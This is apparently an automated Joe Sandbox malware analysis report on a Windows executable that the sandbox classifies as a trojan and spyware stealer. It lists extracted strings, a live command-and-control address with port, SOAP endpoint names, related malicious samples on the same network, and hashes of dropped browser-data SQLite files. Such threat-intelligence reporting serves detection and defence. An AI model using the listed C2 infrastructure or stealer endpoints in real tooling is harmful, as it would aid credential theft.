                                                                        http://www.galapagosdesign.com/staff/dennis.htmMfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://api.ipify.orgcookies//settinString.RemovegMfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.drfalse
                                                                              high
                                                                              http://www.galapagosdesign.com/DPleaseMfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://tempuri.org/Endpoint/VerifyUpdateRegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://tempuri.org/0RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.fonts.comMfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.sandoll.co.krMfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://www.urwpp.deDPleaseMfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.zhongyicts.com.cnMfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.sakkal.comMfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://ipinfo.io/ip%appdata%MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.apache.org/licenses/LICENSE-2.0MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.fontbureau.comMfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icotmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.drfalse
                                                                                                        high
                                                                                                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousRegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://tempuri.org/Endpoint/CheckConnectResponseRegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://schemas.datacontract.org/2004/07/RegSvcs.exe, 00000003.00000002.1992867983.0000000002981000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://api.ip.sb/geoip%USERPEnvironmentROFILE%MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000034C8000.00000004.00000800.00020000.00000000.sdmp, MfzXU6tKOq.exe, 00000000.00000002.1839022362.00000000035C3000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1991404518.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://api.ip.sbRegSvcs.exe, 00000003.00000002.1992867983.0000000002870000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.drfalse
                                                                                                                    high
                                                                                                                    http://tempuri.org/Endpoint/CheckConnectRegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.ecosia.org/newtab/tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.drfalse
                                                                                                                        high
                                                                                                                        http://tempuri.org/Endpoint/SetEnvironRegSvcs.exe, 00000003.00000002.1992867983.00000000029FC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.carterandcone.comlMfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://ac.ecosia.org/autocomplete?q=tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.drfalse
                                                                                                                              high
                                                                                                                              http://www.fontbureau.com/designers/cabarga.htmlNMfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                http://www.founder.com.cn/cnMfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://www.fontbureau.com/designers/frere-user.htmlMfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/08/addressingRegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://185.222.58.82:55615t-kqRegSvcs.exe, 00000003.00000002.1992867983.0000000002981000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      http://tempuri.org/Endpoint/GetUpdatesResponseRegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://www.jiyu-kobo.co.jp/MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://tempuri.org/Endpoint/EnvironmentSettingsResponseRegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://www.fontbureau.com/designers8MfzXU6tKOq.exe, 00000000.00000002.1841351915.00000000065B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://185.222.58.82:55615RegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1992867983.0000000002981000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmpE1DB.tmp.3.dr, tmpA7FB.tmp.3.dr, tmpE1BA.tmp.3.dr, tmpE20E.tmp.3.dr, tmpE1ED.tmp.3.dr, tmpA7EA.tmp.3.dr, tmpA7EB.tmp.3.dr, tmpE20F.tmp.3.dr, tmpE1EC.tmp.3.dr, tmpE1BB.tmp.3.dr, tmpA7D9.tmp.3.dr, tmpE1FD.tmp.3.drfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/soap/actor/nextRegSvcs.exe, 00000003.00000002.1992867983.0000000002821000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  185.222.58.82
                                                                                                                                                  unknownNetherlands
                                                                                                                                                  51447ROOTLAYERNETNLtrue
                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                  Analysis ID:1568226
                                                                                                                                                  Start date and time:2024-12-04 13:16:08 +01:00
                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 5m 58s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                  Number of analysed new started processes analysed:9
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Sample name:MfzXU6tKOq.exe
                                                                                                                                                  renamed because original name is a hash value
                                                                                                                                                  Original Sample Name:3D63B777F65056B236BA51180CD37CE0.exe
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal100.troj.spyw.evad.winEXE@4/44@1/1
                                                                                                                                                  EGA Information:
                                                                                                                                                  • Successful, ratio: 100%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 99%
                                                                                                                                                  • Number of executed functions: 49
                                                                                                                                                  • Number of non-executed functions: 10
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 104.26.12.31, 104.26.13.31, 172.67.75.172
                                                                                                                                                  • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                  • VT rate limit hit for: MfzXU6tKOq.exe
                                                                                                                                                  TimeTypeDescription
                                                                                                                                                  07:17:10API Interceptor1x Sleep call for process: MfzXU6tKOq.exe modified
                                                                                                                                                  07:17:23API Interceptor63x Sleep call for process: RegSvcs.exe modified
                                                                                                                                                  No context
                                                                                                                                                  No context
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  ROOTLAYERNETNLlWnSA7IyVc.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                  • 185.222.58.229
                                                                                                                                                  8ZVd2S51fr.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                  • 185.222.58.241
                                                                                                                                                  Purchase Order Purchase Order Purchase Order Purchase Order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                  • 185.222.57.90
                                                                                                                                                  Purchase Order Purchase Order Purchase Order Purchase Order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                  • 185.222.57.90
                                                                                                                                                  9dOKGgFNL2.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                  • 45.137.22.126
                                                                                                                                                  RFQ List and airflight 2024.pif.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                  • 45.137.22.174
                                                                                                                                                  Calyciform.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                  • 45.137.22.248
                                                                                                                                                  I5pvP0CU6M.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                  • 45.137.22.248
                                                                                                                                                  gLsenXDHxP.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                  • 185.222.58.240
                                                                                                                                                  DEVIS + FACTURE.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                  • 45.137.22.126
                                                                                                                                                  No context
                                                                                                                                                  No context
                                                                                                                                                  Process:C:\Users\user\Desktop\MfzXU6tKOq.exe
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1216
                                                                                                                                                  Entropy (8bit):5.34331486778365
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2666
                                                                                                                                                  Entropy (8bit):5.345804351520589
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:MOfHK5HKxHKdHK8THaAHKzecYHKh3oPtHo6nmHKtXooBHKoHzHZHpHt1qHxLHjH4:vq5qxqdqolqztYqh3oPtI6mq7qoT5JNV
                                                                                                                                                  MD5:90757169D333CB9247B01FB0CAF14023
                                                                                                                                                  SHA1:C47A0AA0CBC960527EA4FA7F61AC1D08B56C23A5
                                                                                                                                                  SHA-256:C04472992BF7CF58327D947D334F1105C14C5CF0D2DD0DF7E7873CAADE0EC61D
                                                                                                                                                  SHA-512:A49B90272EC353DE49C508AF75C509D14A18EA50ABD1CD49BF5313A708CB9654A543E3340C74978B5756A66EF291132E93931853CAD7CC8C85450BB64A318031
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\a3127677749631df61e96a8400ddcb87\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral,
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):49152
                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):49152
                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):49152
                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):49152
                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):49152
                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):49152
                                                                                                                                                  Entropy (8bit):0.8180424350137764
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                  MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                  SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                  SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                  SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):114688
                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):114688
                                                                                                                                                  Entropy (8bit):0.9746603542602881
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                  Category:dropped
